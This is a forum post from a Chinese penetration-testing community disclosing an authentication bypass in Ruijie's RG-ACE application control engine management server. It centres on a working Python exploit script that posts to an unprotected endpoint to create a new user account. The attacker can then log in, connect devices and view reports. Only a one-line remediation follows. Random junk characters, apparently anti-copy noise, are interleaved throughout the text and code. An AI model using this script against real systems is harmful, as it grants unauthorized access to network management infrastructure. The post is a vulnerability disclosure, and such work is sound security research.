中国网络渗透测试联盟

标题: 锐捷应用控制引擎管理服务器可以增加用户 [打印本页]

---

作者: admin    时间: 2012-12-10 10:16
标题: 锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
, Y+ n, v; p- S, h' M

/ S, T- N8 h& ?" B测试的具体版本是
! R% M4 n. t  p; k4 X2 F; q产品名称: 锐捷应用控制引擎
( f* ]4 K1 v, c版本号: 3.1.36.001 TC
. \* Y, T+ q! ?0 U" N" u编译时间: 201104291730

& t2 L: [8 ]+ g, Q) q8 q
. |$ w( q8 v* G& K% W5 k漏洞证明：
1 {9 A# j" n5 Y: {. T

- N, f! v; c' |& \4 J7 O

" ^8 |# K! J- i3 J- N) }( O
- Z2 ~- o" l  g: p- ?* a
执行脚本
: }% r# a; ]% D" p, z( [#! /usr/bin/env python
: h' X1 ~7 Z' {8 `; E: d#coding=gbk
: v( P; O6 h6 G1 H$ E#RG-ACE管理服务器 V3.1.36.001
  W, h1 I3 E+ H5 H8 ?* @import urllib2, urllib,cookielib
, N) [9 g- `; A  ?+ c% Y: w! burl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
  k0 i" X) _- J. w$ w0 q/ d; Popener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
+ r/ b8 C. {! x! ]! y  i("pwd","aaaaaa"),######密码自己加
3 Q* q/ z) w: j* z' p1 b("trueName","ad"),
7 u: k: X* v) J4 a: Q0 g5 l("email",""),
("mobilePhone",""),
("officePhone",""),
7 U9 v6 i2 }  x("addr",""),
/ L3 E" B8 ~( p+ ~4 @! N: |$ h" |("submit","确定"))
urllib2.install_opener(opener)
3 }+ v" E( @- t! l) k+ xp=urllib2.urlopen(url, urllib.urlencode(post)).read()
2 T' R8 {0 }: t9 c0 Fprint "Done"

; C( H' h( t. N/ [' u. \/ ]" S9 w登录，连接设备

4 E. d% ]& `/ G7 b9 [7 {
# T# O$ e% v& p0 l
1 D% V, M$ S. p  Q8 `. P$ O

默认的管理员admin权限更大点

- a- ?) n" A' [8 ^* D
( L; G) B, t- f


: R! k$ h1 {8 `# y* W修复方案：
加强对接口的权限验证

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2